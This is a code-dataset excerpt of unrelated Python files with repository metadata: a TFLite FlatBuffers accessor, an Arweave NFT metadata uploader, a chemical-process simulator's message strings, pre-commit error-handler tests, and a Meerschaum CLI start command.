    # Bug fix: the message previously claimed q=0.5 although both options
    # above are priced with q=0.2.
    print("S=100, K=100, t=0, T=0.5, sigma=0.2, r=0.01, q=0.2 => Call [{}], Put [{}]".format(call_option, put_option))
| 37.552632 | 118 | 0.562018 |
d29723c3ea6e4036936f1deea104a22b602f7c21 | 977 | py | Python | util/third_party/tensorflow_extra/tool/tflite/tflite/NonMaxSuppressionV5Options.py | PascalGuenther/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 82 | 2016-06-29T17:24:43.000Z | 2021-04-16T06:49:17.000Z | util/third_party/tensorflow_extra/tool/tflite/tflite/NonMaxSuppressionV5Options.py | PascalGuenther/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 6 | 2022-01-12T18:22:08.000Z | 2022-03-25T10:19:27.000Z | util/third_party/tensorflow_extra/tool/tflite/tflite/NonMaxSuppressionV5Options.py | PascalGuenther/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 56 | 2016-08-02T10:50:50.000Z | 2021-07-19T08:57:34.000Z | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: tflite
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class NonMaxSuppressionV5Options(object):
    """Auto-generated FlatBuffers accessor for the NonMaxSuppressionV5Options
    table (which defines no fields). Do not edit by hand; regenerate from
    the schema instead."""
    __slots__ = ['_tab']

    @classmethod
    def GetRootAsNonMaxSuppressionV5Options(cls, buf, offset=0):
        # Resolve the root table offset and wrap the buffer.
        n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
        x = NonMaxSuppressionV5Options()
        x.Init(buf, n + offset)
        return x

    @classmethod
    def NonMaxSuppressionV5OptionsBufferHasIdentifier(cls, buf, offset, size_prefixed=False):
        # b"TFL3" is the TensorFlow Lite file identifier.
        return flatbuffers.util.BufferHasIdentifier(buf, offset, b"\x54\x46\x4C\x33", size_prefixed=size_prefixed)

    # NonMaxSuppressionV5Options
    def Init(self, buf, pos):
        self._tab = flatbuffers.table.Table(buf, pos)
# Auto-generated builder helpers: the table has no fields, so Start simply
# opens an empty object and End finishes it, returning its offset.
def NonMaxSuppressionV5OptionsStart(builder): builder.StartObject(0)
def NonMaxSuppressionV5OptionsEnd(builder): return builder.EndObject()
| 33.689655 | 114 | 0.750256 |
6e463ce950c5ab89f5ca899c3ccb55194594d239 | 9,277 | py | Python | arweave_nft_uploader/__init__.py | KultureElectric/arweave-nft-uploader | 3b79229cb42d2c8d2f010bf7fa042a14ae05ebb9 | [
"MIT"
] | 1 | 2021-12-17T22:34:30.000Z | 2021-12-17T22:34:30.000Z | arweave_nft_uploader/__init__.py | KultureElectric/arweave-nft-uploader-dynamicNFTs-patch | 3b79229cb42d2c8d2f010bf7fa042a14ae05ebb9 | [
"MIT"
] | null | null | null | arweave_nft_uploader/__init__.py | KultureElectric/arweave-nft-uploader-dynamicNFTs-patch | 3b79229cb42d2c8d2f010bf7fa042a14ae05ebb9 | [
"MIT"
] | null | null | null | import argparse
import json
import logging
from arweave import Wallet, Transaction
from arweave.transaction_uploader import get_uploader
import os
import sys
import glob
def main():
    """
    Upload Metaplex candy machine NFT assets and metadata to Arweave.

    For every ``<number>.json`` file in ``directory``, the matching asset
    file(s) are uploaded to Arweave, the metadata is patched with the resulting
    URIs and uploaded as well, and the final metadata link is recorded in the
    candy machine cache file (``.cache/<env>-<cache name>.json``).

    Exits with status 1 on unrecoverable setup errors (bad directory,
    uninitialized cache, unloadable wallet).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-e', '--env', default='devnet', help='Solana cluster env name (default: "devnet")')
    parser.add_argument('-k', '--keypair', help='Arweave wallet location (default: "--keypair not provided")')
    parser.add_argument('-v', '--verbose', action='count', default=0, help='increase output verbosity')
    parser.add_argument('-c', '--cache-name', default='temp', help='Cache file name (default: "temp")')
    parser.add_argument('--force-upload', action='store_true',
                        help='Force upload all assets, even the ones that have already been uploaded')
    parser.add_argument('--assets-from-json', action='store_true',
                        help='If this flag is specified, assets file names are read from properties.files.uri/type'
                             ' (e.g. for uploading both png and svg), instead of the default pair NNN.json/NNN.png')
    parser.add_argument('directory', help='Directory containing images named from 0-n')
    args = parser.parse_args()

    # -v raises the log level from INFO to DEBUG; extra -v flags are capped.
    levels = [logging.INFO, logging.DEBUG]
    level = levels[min(len(levels) - 1, args.verbose)]  # capped to number of levels
    logging.basicConfig(level=level, format="%(levelname)s %(message)s")

    # Enumerate assets: only files named <number>.json map to cache items.
    try:
        jsonfiles_raw = glob.glob(os.path.join(args.directory, "*.json"))
        jsonfiles = []
        for jsonfile in jsonfiles_raw:
            # Filename without extension is the cache item
            cache_item, tmp = os.path.splitext(os.path.basename(jsonfile))
            if cache_item.isdigit():
                jsonfiles.append(jsonfile)
            else:
                logging.warning("Json file: " + str(jsonfile) + " is not in the format <number>.json, skipping")
    except Exception as ex:
        logging.error(ex)
        logging.error("Can't enumerate assets in directory: " + str(args.directory))
        sys.exit(1)

    # Load the candy-machine cache file; a missing/corrupt file yields an
    # empty dict, which fails the initialization check below.
    cache_filename = ""
    try:
        cache_filename = os.path.join('.cache', args.env + "-" + args.cache_name + '.json')
        with open(cache_filename, 'r') as f:
            cache_data = json.load(f)
    except Exception as ex:
        cache_data = {}
    if "program" not in cache_data or "items" not in cache_data or "0" not in cache_data["items"]:
        logging.error("")
        logging.error("Cache file " + str(cache_filename) + " is not initialized with a candy machine program")
        logging.error("")
        logging.error("You must initialize the candy machine program with a single 0.json and 0.png file,")
        logging.error("specifying the total number of NFTs with the -n option, like this:")
        logging.error("")
        logging.error("ts-node ~/metaplex-foundation/metaplex/js/packages/cli/src/candy-machine-cli.ts"
                      " upload <single asset dir> -n {} --keypair <keypair file> --env <env name>".format(
                          len(jsonfiles)))
        logging.error("")
        logging.error("*** It is VERY important that <single asset dir> ONLY contains 0.json and 0.png ***")
        logging.error("*** to avoid uploading all the assets with candy-machine-cli.ts ***")
        sys.exit(1)

    # Load arweave wallet
    try:
        wallet = Wallet(args.keypair)
        logging.info("Initial Arweave wallet balance: {}".format(wallet.balance))
    except Exception as ex:
        logging.error(ex)
        logging.error("Can't load Arweave wallet: " + str(args.keypair))
        sys.exit(1)

    # Upload assets; individual failures are counted and reported at the end
    # so a single bad asset does not abort the whole batch.
    num_upload_errors = 0
    logging.info("Starting the upload for {} assets".format(len(jsonfiles)))
    for idx, jsonfile in enumerate(jsonfiles):
        # Filename without extension is the cache item
        cache_item, tmp = os.path.splitext(os.path.basename(jsonfile))
        if not cache_item.isdigit():
            logging.warning("Json file: " + str(jsonfile) + " is not in the format <number>.json, skipping")
            continue
        # Check if the asset is already in cache and already uploaded, unless --force-upload flag is specified
        if not args.force_upload:
            if cache_item in cache_data["items"] and "uploadedToArweave" in cache_data["items"][cache_item] \
                    and cache_data["items"][cache_item]["uploadedToArweave"]:
                logging.debug("Skipping already uploaded file: " + str(jsonfile))
                continue
        # Load json file
        msg = "Processing file: {}".format(idx)
        if idx % 50 == 0:
            logging.info(msg)
        else:
            logging.debug(msg)
        try:
            with open(jsonfile, 'r') as f:
                asset_data = json.load(f)
        except Exception as ex:
            logging.error(ex)
            # BUGFIX: the ", skipping" suffix used to be concatenated *outside*
            # the logging.error(...) call, raising TypeError (None + str).
            logging.error("Can't load json file: " + str(jsonfile) + ", skipping")
            num_upload_errors += 1
            continue
        # Get asset name
        try:
            asset_name = asset_data["name"]
        except Exception as ex:
            logging.error(ex)
            # BUGFIX: same misplaced-parenthesis TypeError as above.
            logging.error("Json file: " + str(jsonfile) + " has no name, skipping")
            num_upload_errors += 1
            continue
        # Locate asset files; with --assets-from-json the file list comes from
        # the metadata itself, otherwise <number>.html is paired with the json.
        asset_files = []
        try:
            if args.assets_from_json:
                files = asset_data["properties"]["files"]
                for idx2, tmp in enumerate(asset_data["properties"]["files"]):
                    asset_file = os.path.join(args.directory, files[idx2]["uri"])
                    if os.path.isfile(asset_file):
                        asset_files.append({"file": asset_file, "type": files[idx2]["type"], "idx": idx2})
                    else:
                        raise Exception("Can't find asset file: " + str(asset_file))
            else:
                asset_file = jsonfile.replace(".json", ".html")
                if os.path.isfile(asset_file):
                    asset_files = [{"file": asset_file, "type": "text/html", "idx": 0}]
                else:
                    raise Exception("Can't find asset file: " + str(asset_file))
                asset_data["properties"]["files"] = [{"uri": "", "type": "text/html"}]
        except Exception as ex:
            logging.error(ex)
            logging.error("Can't find all assets for json file: " + str(jsonfile) + ", skipping")
            num_upload_errors += 1
            continue
        try:
            # Upload asset files
            has_asset_image = False
            for asset in asset_files:
                asset_filename, asset_fileext = os.path.splitext(asset["file"])
                asset_fileext = asset_fileext.lstrip(".")
                with open(asset["file"], 'rb', buffering=0) as file_handler:
                    tx = Transaction(wallet, file_handler=file_handler, file_path=asset["file"])
                    tx.add_tag('Content-Type', asset["type"])
                    tx.sign()
                    uploader = get_uploader(tx, file_handler)
                    while not uploader.is_complete:
                        uploader.upload_chunk()
                txdict = tx.to_dict()
                uri = "https://arweave.net/{}?ext={}".format(txdict["id"], asset_fileext)
                asset_data["properties"]["files"][asset["idx"]]["uri"] = uri
                # The first html asset becomes both the preview image and the
                # animation URL (dynamic-NFT patch of the original png flow).
                if not has_asset_image and asset_fileext == "html":
                    has_asset_image = True
                    asset_data["image"] = uri
                    asset_data["animation_url"] = uri
            if not has_asset_image:
                # BUGFIX: message used to say "png image" although the check
                # above requires an html asset.
                logging.error("At least one html asset is required for json file: " + str(jsonfile) + ", skipping")
                num_upload_errors += 1
                continue
            # Upload metadata
            tx = Transaction(wallet, data=json.dumps(asset_data))
            tx.add_tag('Content-Type', "application/json")
            tx.sign()
            tx.send()
            txdict = tx.to_dict()
            uri = "https://arweave.net/{}".format(txdict["id"])
            # Record the metadata link; onChain stays False until the candy
            # machine index is updated by candy-machine-cli.
            cache_data["items"][cache_item] = {"link": uri,
                                               "name": asset_name,
                                               "onChain": False,
                                               "uploadedToArweave": True}
            with open(cache_filename, 'w') as f:
                json.dump(cache_data, f)
        except Exception as ex:
            logging.error(ex)
            logging.error("Can't upload assets for json file: " + str(jsonfile) + ", skipping")
            num_upload_errors += 1
            continue
    logging.info("")
    logging.info("Ending Arweave wallet balance: {}".format(wallet.balance))
    if num_upload_errors > 0:
        logging.warning("There have been {} upload errors. "
                        "Please review them and retry the upload with the same command".format(num_upload_errors))
    else:
        logging.info("Upload complete! Now you can update the index with 'candy-machine-cli.ts upload'"
                     " using the full assets directory (see documentation)")
| 48.067358 | 116 | 0.572707 |
e19c19635ca289b81694000e80c426260fd170ad | 14,658 | py | Python | sim21/solver/langs/English.py | kpatvt/sim21 | 4cbbfcbef6371d3dc5404429545e003a48c69ba5 | [
"Artistic-2.0"
] | 7 | 2021-08-23T18:46:27.000Z | 2022-01-26T07:10:22.000Z | sim21/solver/langs/English.py | kpatvt/sim21 | 4cbbfcbef6371d3dc5404429545e003a48c69ba5 | [
"Artistic-2.0"
] | null | null | null | sim21/solver/langs/English.py | kpatvt/sim21 | 4cbbfcbef6371d3dc5404429545e003a48c69ba5 | [
"Artistic-2.0"
] | null | null | null | def Messages():
"""create dictionary of English messages"""
m = {'AddCompoundError': "Thermo provider reports the following error when adding compound:\n%s",
'AdjustingFromOlderVersion': "Recalling case created in an older version. Updating from: FlowsheetVersion = "
"%d; ReleaseVersion = %s. To: FlowsheetVersion %d; ReleaseVersion %s",
'AfterPortDisconnect': "%s disconnected from %s",
'BalanceInvalidPort': "Invalid port for balance (not material or energy)",
'BeforePortDisconnect': "Disconnecting %s from %s",
'BubbleTCouldNotCalc': "Bubble Point temperature could not be calculated in %s at P = %s kPa and composition "
"= %s",
'CalcDisturbance': "Calculating disturbance %i of %i in jacobian of %s",
'CalculatingProfile': "Calculating profile in %s. Segment %i. Properties %s",
'CalculatingStep': "Calculating step %i in %s. Currently in %g. Going from %g to %g",
'CantAddObject': "Can't add %s to %s", 'CantAddToStage': "Can't add %s to stage %d of %s",
'CantAddToStageObject': "Can't add %s to %s on stage %d of %s", 'CantChangeName': "Can't change name of %s",
'CantCloneFlowsheet': "Can't clone flowsheet %s if stacks are not empty (solve, forget, unconverged "
"recycles, consistency errors)",
'CantCreateSpec': "Can't create spec %s. It is probably not supported",
'CantDeleteFromStage': "Can't delete %s from stage %d of %s",
'CantDeleteObject': "Can't delete object %s. Unit op can not solve with out it",
'CantDelPortDirectly': "Can't delete port %s from %s. Delete associated object instead",
'CantEstimate': "Could not estimate missing %s while initializing %s",
'CantFindPhCh': "Can't find phase changes in %s for more than two sides or when solving in rating mode (UA "
"values specified)",
'CantMoveToStage': "Can't move %s to stage %d of %s. Make sure there are no conflicting names",
'CantOverwriteThermo': "Can't overwrite a thermo case. The correct procedure is to first delete old thermo "
"and then set a new thermo. Unit op: %s; Current thermo: %s",
'CantSetIP': "Can't set interaction parameter with value %f for compounds %s and %s",
'CantSetLiqPhPar': "Can't set number of liquid phases to %s",
'CantSetSingleFrac': "Can't set the mass or volume fraction of one single compound %s in a material port %s.",
'CantSetParameter': "Can't set parameter %s to value %s",
'CantUseSpecInZeroFlow': "Can't use specs in a zero flow draw %s.",
'ChangedEffMatrix': "The efficiencies matrix changed as a result of a change in configuration in %s",
'ChangedPortState': "Changed state of port %s to %d (0=Normal port; 1=Recycle port)",
'CompNotNormalized': "Mole fractions of %s sums to %f, not 1",
'ConnectErrorNoPort': "Can't connect %s.%s to %s.%s as a port is missing",
'ConnectErrorNoUop': "Can't connect %s.%s to %s.%s as a unit op is missing",
'ConnectSameTypePorts': "Attempt to connect ports of differing types in %s",
'ConnectSigToNonSig': "Attempt to connect signal port %s to a non signal port",
'ContDerivCalc': "Controller solver for %s calculating derivative %d",
'ControllerConvergeFail': "Controller solver for %s failed to converge",
'ControllerTotalError': "Controller solver for %s error - %f", 'Converged': "Converged %s in %i iterations",
'ConvergedOp': "Converged %s", 'CouldNotConverge': "Could not converge %s after %d iterations",
'CouldNotConvergeInner': "Could not converge Inner loop %s after %d iterations",
'CouldNotConvergeOuter': "Could not converge Outer loop %s after %d iterations",
'CouldNotConvergeUA': "Could not solve for UA = %f in %s",
'CouldNotInitialize': "Could not initialize set of equations when solving %s",
'CouldNotInvertJacobian': "Could not invert Jacobian in %s",
'CouldNotLoadLanguage': "Could not load language %s",
'CouldNotLoadProvider': "Could not load thermo provider %s",
'CouldNotRestorePlugIn': "Could not restore plug in object %s when recalling case. The default object will "
"be used instead",
'CouldNotSolve': "Could not solve %s",
'CouldNotSolveNonSuppFlash': "Could not solve non supported flash with variables %s = %s, %s = %s in %s",
'CreatePortTypeError': "Port %s does not have a valid type in %s",
'CrossConnMoleLoss': "A significant loss of mole flow of %f was detected in the cross connector %s. A common "
"reason is the mismatch of compounds that contain significant flows",
'DeletePortError': "Cannot delete port %s from %s",
'DewTCouldNotCalc': "Dew Point temperature could not be calculated in %s at P = %s kPa and composition = %s",
'DiffThCaseInConn': "Different thermo case found across port connection %s -> %s. The values could not be "
"passed",
'DoneProfile': "Done calculating profile in %s",
'DuplicateName': "Command failed due to a duplication of the name %s in %s",
'ErrInCleanUp': "Error while cleaning up %s",
'ErrNotifyChangeCmp': "Error while notifying %s of a change in the compounds list",
'ErrNotifyLiqChange': "Error while notifying %s of a change of the number of liquid phases. LiquidPhases = %s",
'ErrNotifyParChange': "Error while notifying %s of a change of the value of a parameter. %s = %s",
'ErrNotifySolChange': "Error while notifying %s of a change of the number of solid phases. LiquidPhases = %s",
'ErrNotifyThChange': "Error while notifying %s of a change of thermodynamic case. ThermoCase = %s",
'ERRSettingThermo': "Error attempting to set thermo into unit op: %s; Thermo attempted: %s",
'ErrSpecialProp': "Error calculating special property in %s. Message form thermo provider: %s",
'ErrorSolvingDesign': "Error solving design object %s",
'ERRTowerArithmetic': "Tower %s failed to converge due to an arithmetic error",
'EqnCalcError': "Calculation error in %s",
'EqnDuplicateSigName': "Signal name %s is used more than once in equation %s",
'EqnNumbMismatch': "Error in equation counting in %s",
'EqnParenMismatch': "Mismatched parenthesis in %s of Equation %s",
'EqnSyntax': "Syntax error in %s in Equation %s",
'EqnUnknownToken': "Don't know how to deal with %s in equation %s of %s",
'EqnBasedUOpError': "%s Iteration %d Max Error %f",
'FlashFailure': "Flash failed in %s. Message from Thermo Provider: %s",
'HotTLowerThanColdT': "The temperature of the hot inlet %f is lower than the temperature of the cold inlet "
"%f in %s",
'HydrateCouldNotCalc': "Hydrate temperature could not be calculated in %s at P = %s kPa and composition = %s",
'HydrateLowP': "Hydrate can not be formed at low pressure condition of P = %s kPa in %s",
'InnerErrorDetail': "%s Inner Details. Error: %13.6g ; MaxErrorValue: %13.6g ; MaxErrorEqnName: %s ",
'InnerLoopSummary': """%s Inner Loop Summary:
MaxErrorEqnName:......... %s
MaxErrorValue:........... %.6g
MaxDeltaTStage(0 at top): %i
MaxDeltaTValue(New-Old):. %.4g
Converged:............... %i
Iterations:.............. %i""", 'InvalidCalcStatusInSet': "Invalid calcStatus in SetValue",
'InvalidComposition': "The %s composition = %f in %s. It has been reset to zero.",
'InvalidDrawPhase': "Invalid phase for draw on stage %d of %s",
'InvalidTowerSpecPhase': "Invalid phase in spec on stage %d of %s",
'LumpLiqs': "A second liquid with fraction %f is detected in a two phase VL flash.",
'MaxSolverIterExceeded': "Maximum %d iterations exceeded in solving flowsheet %s",
'MissingSpecs': "Missing %d specifications", 'MissingVariable': "Missing %s in %s",
'MissigZInCommonProps': "Z Factor should always be in the common properties. Attempted to set: %s",
'NonHydrateFormerFound': "Non hydrate former was found coming into %s",
'NoPortDirection': "Port %s requires direction (in or out) in %s",
'NoSupportForReqArrProps': "The thermo provider %s doesn't support the following required array properties %s",
'NoSupportForReqProps': "The thermo provider %s doesn't support the following required properties %s",
'NotConverging': "%s does not seem to be converging and calculations were stopped. Change the parameter "
"MonitorConvergence to 0 if you wish to deactivate this feature",
'NoVersionUpdate': "No update for %d (%s) to %d (%s)",
'ODEMaxSteps': "Maximum integration steps reached (%i) in %s. Increase ODEMaxSteps if integration was "
"proceeding correctly",
'OuterErrorDetail': "%s Iteration %d Outer Error %13.6g. MaxErrorStage(0 at top) %i WaterDrawError %13.6g",
'OverspecFlash': "Could not perform flash calculation in %s because it is overspecified. Only 2 variables "
"needed and %i were given (%s)",
'PortNotFlashedDesignObj': "Ports from unit op are not flashed therefore design object %s not ready to be "
"solved",
'RawOutput': "%s", 'RecycleErrorDetail': "%s %s %g vs %g",
'RecycleConsistency': "Consistency Error %s %s %g vs %g", 'RecycleIter': "Iteration %d -> max Error %f in %s",
'RenamePort': "Rename port %s.%s to %s. It is connected to %s",
'RenamePortError': "Cannot rename port %s to %s",
'RenamePortNameExists': "Cannot rename port %s to %s as that name is already used",
'RevertingFromNewerVersion': "Recalling case created in a newer version. Updating from: flowsheet version "
"%d, release version %s. To: flowsheet version %d release version %s",
'SetValueUnknownNotNone': "SetValue with UNKNOWN_V flag must have value = None",
'SetVarTypeMismatch': "Port variable type %s is not %s in %s",
'SigConnectTypeMismatch': "Variable type conflict (%s vs %s) when connecting %s to %s",
'SigShareMismatch': "Variable type conflict (%s vs %s) when sharing %s with %s",
'SolvingDesign': "Solving design object %s", 'SolvingOp': "Solving operation %s",
'SpecConflict': "Specification conflict between %s and %s in %s", 'Status': "%s",
'StepSizeTooSmall': "Step size underflow in %s. Step size = %g",
'TemperatureCross': "Temperature cross (%f %f) in %s",
'InternalTCross': "Internal temperature cross in %s. See profiles for details",
'NoPkgSelected': "No thermo package was selected when attempted to create %s",
'ThermoProviderMsg': "Msg from thermo provider when solving %s:\n%s",
'TooManySolidPhases': "Too many solid phases requested(%d) when attempting flash from %s",
'TooManyTowerSpecs': "%d specs found, only %d needed in %s",
'TowerCalcJacobian': "Calculating Jacobian for %s",
'TowerCmpMatrixError': "%s had an error in solving the material balances for component %d",
'TowerDeletePort': "Cannot directly delete port %s from %s. Select and delete the associated draw or spec",
'TowerEffSetToOne': "Tower efficiency in the top stage was set to 1.0 because the vapour draw is 0",
'TowerFailedToConverge': "%s failed to converge in %d iterations - error = %f",
'TowerInnerError': "%s Inner Error %f", 'TowerNoPressure': "No outlet pressures available for tower %s",
'TowerOuterError': "%s Iteration %d Outer Error %f", 'TowerQSpecError': "Can't assign energy flow to stage %d",
'TowerRemoveLastStage': "Cannot remove %d stages from below stage %d",
'TowerPARemovalError': "Cannot remove a stage with a feed from a pump around unless the pump around is "
"removed too. Feed is in stage %i, pump around from stage %i",
'TowerSSRemoveError': "Top or bottom tower stages cannot be removed unless the whole section is removed",
'TowerUpdateEffErr': "An error occurred while attempting to update the efficiencies matrix in %s. Please "
"update manually",
'TowerMissingFeedInfo': "Feed %s is not fully specified", 'TwrNoFeed': "No feeds were found in %s",
'TwrSpecErr': "Error while calculating the spec %s",
'TwrSpecErrConfig': "The spec %s was installed into an invalid object %s. For example, a pump around spec "
"installed into something different from a pump around",
'TwrSubCooledVapDraw': "Tower failed to converge due to a sub cooled solution at the top where there is a "
"vapour draw. Degrees of subcooling = %f",
'UnresolvedConsistencyErrors': "The following consistency errors in flowsheet %s have not been resolved ("
"only lists one per unit operation):\n%s",
'UnresolvedRecycles': "The following recycle ports in flowsheet %s have not been converged (only lists one "
"per unit operation):\n%s",
'UpdateInvalidPort': "Port %s does not exist in %s - can't update",
'WrongDiamEjector': "Wrong diameter specification in %s. Nozzle diameter must be smaller than throat "
"diameter. Nozzle D = %f; Throat D = %f",
'WrongNumberTowerSpecs': "Mismatch in number of tower specs - %d vs %d needed in %s",
'WrongParentDesignObj': "Design object %s contained in the wrong type of unit operation",
'WrongSetting': "Invalid value %s for setting %s in object %s", 'DoneSolving': "Flowsheet %s solved",
'NoMessage': "", 'MissingValue': "%s has no value", 'ErrorValue': "Error = %s", 'OK': "OK", 'T': "Temperature",
'P': "Pressure", 'H': "Enthalpy", 'VapFrac': "VapFrac", 'MoleFlow': "MoleFlow", 'MassFlow': "MassFlow",
'VolumeFlow': "VolumeFlow", 'Energy': "Energy", 'MolecularWeight': "MolecularWeight", 'ZFactor': "ZFactor"}
# Following messages not in alphabetical order to keep all the properties together
return m
| 85.22093 | 120 | 0.637331 |
833bb8f8372c0d90bf498190eabbce78609b69a9 | 5,098 | py | Python | tests/error_handler_test.py | Pierre-Sassoulas/pre-commit | fd53cdea17ed17a1775fc5e23e75d6ecdbdb04b6 | [
"MIT"
] | 1 | 2020-07-25T12:34:17.000Z | 2020-07-25T12:34:17.000Z | tests/error_handler_test.py | Pierre-Sassoulas/pre-commit | fd53cdea17ed17a1775fc5e23e75d6ecdbdb04b6 | [
"MIT"
] | null | null | null | tests/error_handler_test.py | Pierre-Sassoulas/pre-commit | fd53cdea17ed17a1775fc5e23e75d6ecdbdb04b6 | [
"MIT"
] | 18 | 2020-06-20T07:52:16.000Z | 2022-01-20T22:03:26.000Z | import os.path
import re
import sys
from unittest import mock
import pytest
from pre_commit import error_handler
from pre_commit.util import CalledProcessError
from testing.util import cmd_output_mocked_pre_commit_home
@pytest.fixture
def mocked_log_and_exit():
    """Patch ``error_handler._log_and_exit`` and yield the mock for assertions."""
    with mock.patch.object(error_handler, '_log_and_exit') as log_and_exit:
        yield log_and_exit
def test_error_handler_no_exception(mocked_log_and_exit):
    """A body that raises nothing must never invoke ``_log_and_exit``."""
    with error_handler.error_handler():
        pass
    mocked_log_and_exit.assert_not_called()
def test_error_handler_fatal_error(mocked_log_and_exit):
    """A FatalError is logged as 'An error has occurred' with a traceback."""
    exc = error_handler.FatalError('just a test')
    with error_handler.error_handler():
        raise exc
    mocked_log_and_exit.assert_called_once_with(
        'An error has occurred',
        exc,
        # Tested below
        mock.ANY,
    )
    # The third argument is the formatted traceback; verify its shape.
    assert re.match(
        r'Traceback \(most recent call last\):\n'
        r' File ".+pre_commit.error_handler.py", line \d+, in error_handler\n'
        r' yield\n'
        r' File ".+tests.error_handler_test.py", line \d+, '
        r'in test_error_handler_fatal_error\n'
        r' raise exc\n'
        r'(pre_commit\.error_handler\.)?FatalError: just a test\n',
        mocked_log_and_exit.call_args[0][2],
    )
def test_error_handler_uncaught_error(mocked_log_and_exit):
    """A non-FatalError exception is logged as 'An unexpected error has occurred'."""
    exc = ValueError('another test')
    with error_handler.error_handler():
        raise exc
    mocked_log_and_exit.assert_called_once_with(
        'An unexpected error has occurred',
        exc,
        # Tested below
        mock.ANY,
    )
    # The third argument is the formatted traceback; verify its shape.
    assert re.match(
        r'Traceback \(most recent call last\):\n'
        r' File ".+pre_commit.error_handler.py", line \d+, in error_handler\n'
        r' yield\n'
        r' File ".+tests.error_handler_test.py", line \d+, '
        r'in test_error_handler_uncaught_error\n'
        r' raise exc\n'
        r'ValueError: another test\n',
        mocked_log_and_exit.call_args[0][2],
    )
def test_error_handler_keyboardinterrupt(mocked_log_and_exit):
    """Ctrl-C (KeyboardInterrupt) is logged as 'Interrupted (^C)'."""
    exc = KeyboardInterrupt()
    with error_handler.error_handler():
        raise exc
    mocked_log_and_exit.assert_called_once_with(
        'Interrupted (^C)',
        exc,
        # Tested below
        mock.ANY,
    )
    # The third argument is the formatted traceback; verify its shape.
    assert re.match(
        r'Traceback \(most recent call last\):\n'
        r' File ".+pre_commit.error_handler.py", line \d+, in error_handler\n'
        r' yield\n'
        r' File ".+tests.error_handler_test.py", line \d+, '
        r'in test_error_handler_keyboardinterrupt\n'
        r' raise exc\n'
        r'KeyboardInterrupt\n',
        mocked_log_and_exit.call_args[0][2],
    )
def test_log_and_exit(cap_out, mock_store_dir):
    """``_log_and_exit`` prints a summary, writes pre-commit.log, and exits."""
    with pytest.raises(SystemExit):
        error_handler._log_and_exit(
            'msg', error_handler.FatalError('hai'), "I'm a stacktrace",
        )
    printed = cap_out.get()
    log_file = os.path.join(mock_store_dir, 'pre-commit.log')
    assert printed == f'msg: FatalError: hai\nCheck the log at {log_file}\n'
    # The log file should contain version info, the error, and the stacktrace.
    assert os.path.exists(log_file)
    with open(log_file) as f:
        logged = f.read()
    expected = (
        r'^### version information\n'
        r'\n'
        r'```\n'
        r'pre-commit version: \d+\.\d+\.\d+\n'
        r'sys.version:\n'
        r'( .*\n)*'
        r'sys.executable: .*\n'
        r'os.name: .*\n'
        r'sys.platform: .*\n'
        r'```\n'
        r'\n'
        r'### error information\n'
        r'\n'
        r'```\n'
        r'msg: FatalError: hai\n'
        r'```\n'
        r'\n'
        r'```\n'
        r"I'm a stacktrace\n"
        r'```\n'
    )
    assert re.match(expected, logged)
def test_error_handler_non_ascii_exception(mock_store_dir):
    """The handler must cope with exceptions whose message is non-ASCII."""
    snowman_error = ValueError('☃')
    with pytest.raises(SystemExit):
        with error_handler.error_handler():
            raise snowman_error
def test_error_handler_non_utf8_exception(mock_store_dir):
    """Byte payloads that are not valid UTF-8 must not crash the handler."""
    bad_bytes_error = CalledProcessError(1, ('exe',), 0, b'error: \xa0\xe1', b'')
    with pytest.raises(SystemExit):
        with error_handler.error_handler():
            raise bad_bytes_error
def test_error_handler_non_stringable_exception(mock_store_dir):
    """An exception whose __str__ itself raises must still be handled."""
    class Unstringable(Exception):
        def __str__(self):
            raise RuntimeError('not today!')

    with pytest.raises(SystemExit):
        with error_handler.error_handler():
            raise Unstringable()
def test_error_handler_no_tty(tempdir_factory):
    """Without a tty, the handler still prints the error and log location."""
    pre_commit_home = tempdir_factory.get()
    # Run the handler in a subprocess so there is genuinely no tty attached.
    ret, out, _ = cmd_output_mocked_pre_commit_home(
        sys.executable,
        '-c',
        'from pre_commit.error_handler import error_handler\n'
        'with error_handler():\n'
        ' raise ValueError("\\u2603")\n',
        retcode=1,
        tempdir_factory=tempdir_factory,
        pre_commit_home=pre_commit_home,
    )
    log_file = os.path.join(pre_commit_home, 'pre-commit.log')
    out_lines = out.splitlines()
    assert out_lines[-2] == 'An unexpected error has occurred: ValueError: ☃'
    assert out_lines[-1] == f'Check the log at {log_file}'
0375d6a7e406b04bf04969ee7852cf83e447c249 | 11,257 | py | Python | meerschaum/actions/start.py | bmeares/Meerschaum | 37bd7a9923efce53e91c6a1d9c31f9533b9b4463 | [
"Apache-2.0"
] | 32 | 2020-09-14T16:29:19.000Z | 2022-03-08T00:51:28.000Z | meerschaum/actions/start.py | bmeares/Meerschaum | 37bd7a9923efce53e91c6a1d9c31f9533b9b4463 | [
"Apache-2.0"
] | 3 | 2020-10-04T20:03:30.000Z | 2022-02-02T21:04:46.000Z | meerschaum/actions/start.py | bmeares/Meerschaum | 37bd7a9923efce53e91c6a1d9c31f9533b9b4463 | [
"Apache-2.0"
] | 5 | 2021-04-22T23:49:21.000Z | 2022-02-02T12:59:08.000Z | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
"""
Start subsystems (API server, logging daemon, etc.).
"""
from __future__ import annotations
from meerschaum.utils.typing import SuccessTuple, Optional, List, Any
def start(
    action : Optional[List[str]] = None,
    **kw : Any,
) -> SuccessTuple:
    """
    Start subsystems (API server, logging daemon, etc.).
    """
    from meerschaum.utils.misc import choose_subaction
    # Dispatch table of sub-action names to their handlers.
    subactions = {'api': _start_api, 'jobs': _start_jobs}
    return choose_subaction(action, subactions, **kw)
def _complete_start(
    action : Optional[List[str]] = None,
    **kw : Any
) -> List[str]:
    """
    Override the default Meerschaum `complete_` function.
    """
    if action is None:
        action = []
    subcompleters = {
        'job': _complete_start_jobs,
        'jobs': _complete_start_jobs,
    }
    last_word = kw.get('line', '').split(' ')[-1]
    # Delegate to the sub-completer once the sub-action word is finished.
    if action and action[0] in subcompleters and last_word != action[0]:
        sub_name = action.pop(0)
        return subcompleters[sub_name](action=action, **kw)
    from meerschaum.actions.shell import default_action_completer
    return default_action_completer(action=(['start'] + action), **kw)
